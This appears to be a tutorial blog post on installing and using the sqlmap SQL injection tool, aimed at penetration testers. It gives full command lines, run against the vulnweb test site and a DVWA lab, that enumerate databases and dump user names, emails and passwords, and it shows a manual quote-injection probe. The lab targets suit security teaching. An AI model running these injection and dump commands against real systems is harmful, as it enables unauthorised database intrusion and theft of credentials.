SQLmap Install

By alexxk5111

SQL injection is one of the most critical and prevalent vulnerabilities existing in the enterprise security till date. SQLmap is a popular open source tool that helps penetration testers detect and exploit SQL injection flaws automatically. This Python-based tool helps testers taking over of database servers. Above all, if you are interested in learning this tool, you can learn it with the help of sqlmap tutorial and by joining a good course.

It features a powerful detection engine and features that enable ultimate penetration testing. You will find many switches like database fingerprinting, data fetching and executing commands on operating systems.

SQLmap can be used for the following:

  • Scan web appsagainst SQL injection vulnerability
  • Exploit SQL injection vulnerability
  • Extract databases and database user detailentirely
  • Bypass Web Application Firewall (WAF) by using tamper scripts
  • Own the underlying operating system

Key Features of SQLmap Testing Tool

  • Supports MySQL, Oracle, PostgreSQL, Microsoft Access, Microsoft SQL Server, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB DBMSs.
  • Fully supports six SQL injection procedures: boolean-based blind, error-based, UNION query, time-based blind, stacked queries and out-of-band.
  • Supports cracking password hash formats using a dictionary-based attack
  • Allows enumeration of users, password hashes, privileges, roles, databases, tables and columns

So, if want to learn SQLmap, check the following quick SQLmap tutorials. Also, get familiar with the best resources to learn SQLmap as a beginner.

Contents [show]

How to use SQLmap on windows?

Here is the simple and easy process to setup and install SQLmap on windows:

Step 1: First, Download and Install Python

SQLmaptool has been written in Python language. So, the first thing you require is the Python interpreter. Click python.org to download the Python interpreter.

SQLmap runs smoothly with both series of Python, 2.7.x and 3.3.x.

Step 2: Download and Install SQLmap

  • Download the SQLmap zip file from sqlmap.org.
  • Extract the downloadedSQLmap zip file in a desired directory.
  • Open the DOS prompt and go to the SQLmapdirectory.
  • Run the SQLmap.pycode with the Python interpreter.

SQLmap Tutorial For Kali Linux

Boot into Kali Linux machine. Start a terminal and type

Sqlmap –h

It will list the basic commands supported by SQLmap. Start with a simple command:

sqlmap -u <URL to inject>. In this tutorial, it will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

Use –time-sec to speed up the process in case of slow server responses:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15

It will show the Mysql version along with useful information about the database, like this:


SQLmap may ask some questions that have to be answered in yes or no. You have to type N for noand Y for yes.

Enumeration

Obtain the names of available databases by adding –dbs to the previous command:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs

Table

Specify the desired database using –D and tell SQLmap to list the tables using –tables command. So, the final SQLmap command will be:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

The result would be-



Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

Columns

Specify the database using –D, table using – T and columns using –columns:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users –columns
It will give you the result like this:
Database: acuart
Table: users

[8 columns]
+----------------------------------+
| Column | Type |
+----------------------------------+
| address | mediumtext |
| name | varchar (100) |
| pass | varchar (100) |
| phone | varchar (100) |
+----------------------------------+

Data

As usual, use –D for database, -T for table, -C for column and –dump for data. The final command to fetch data will appear as shownbelow:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C phone,name,pass --dump

The output would be:

[15:41:00] [INFO] fetching columns ‘email, name, pass’ for table ‘users’ in database ‘acuart’
[15:41:01] [INFO] the SQL query used returns 4 entries
[15:41:04] [INFO] retrieved: pass
[15:41:08] [INFO] retrieved: varchar (100)
[15:41:09] [INFO] retrieved: email
[15:41:08] [INFO] retrieved: varchar (100)
[15:41:10] [INFO] retrieved: name
[15:41:14] [INFO] retrieved: varchar (100)
[15:41:14] [INFO] fetching entries of column(s) ‘email, name, pass’ for table ‘users’ in database ‘acuart’
[15:41:14] [INFO] the SQL query used returns 1 entries
[15:41:16] [INFO] retrieved: [email protected]
[15:41:20] [INFO] retrieved: John Smith
[15:41:22] [INFO] retrieved: test
[15:41:22] [INFO] analyzing table dump for possible password hashes

Database: acuart
Table: users
[ 1 entry ]
+-----------------------------------------------------+
| pass | name | email |
| test | John Smith | [email protected] |
+-----------------------------------------------------+

SQLmapTutorial Windows

This tutorial explains how to use SQLmap for exploiting a vulnerable web application. To properly understand this tutorial, you need to have the knowledge of how database-based web apps work. In this tutorial, we will consider php+mysql.

Vulnerable URL

Suppose, your web application has the following URL,and it is prone to SQL injection:

http://www.example.com/section.php?id=51

It is vulnerable to SQL injection because the developer didn’t properly escape the parameter ID. You can test it simply by trying to open the URL:

http://www.example.com/section.php?id=51‘

By adding symbol (‘) at the end of the URL string. If the URL responds with an error or reacts unexpectedly, it means the database has got the unexpected single quote which the web app failed to escape properly. In this case, the input parameter “id” is prone to SQL injection.

SQLmap Dump Table

To dump the data present in a table, use “-dump-all”. The command will look like:

In Windows

python sqlmap.py

--url="http://192.168.152.129/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#"
--cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D dvwa
-T users -C user_id,user,password –dump

In Linux

./sqlmap.py
--url="http://192.168.152.129/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#"
--cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D dvwa
-T users -C user_id,user,password --dump
–dump tells SQLMap to dump all the entries in the table. And, the –cookie session maintains access while attacking.

How to install SQLmap on ubuntu?

Step1: Download SQLmap in your machine using this command:

wget 'https://github.com/sqlmapproject/sqlmap/tarball/master' --output-document=sqlmap.tar.gz

It will download SQLmap on your machine from GitHub into your current directory.

Step 2: Use this command to extract your SQLmap package from tar file:

tar -xvf sqlmap.tar.gz

Step 3: Go to your SQLmap directory and run the following command:

cd sqlmapproject-sqlmap-c4f9e66/
Python sqlmap.py --version

It will test SQLmap in ubuntu.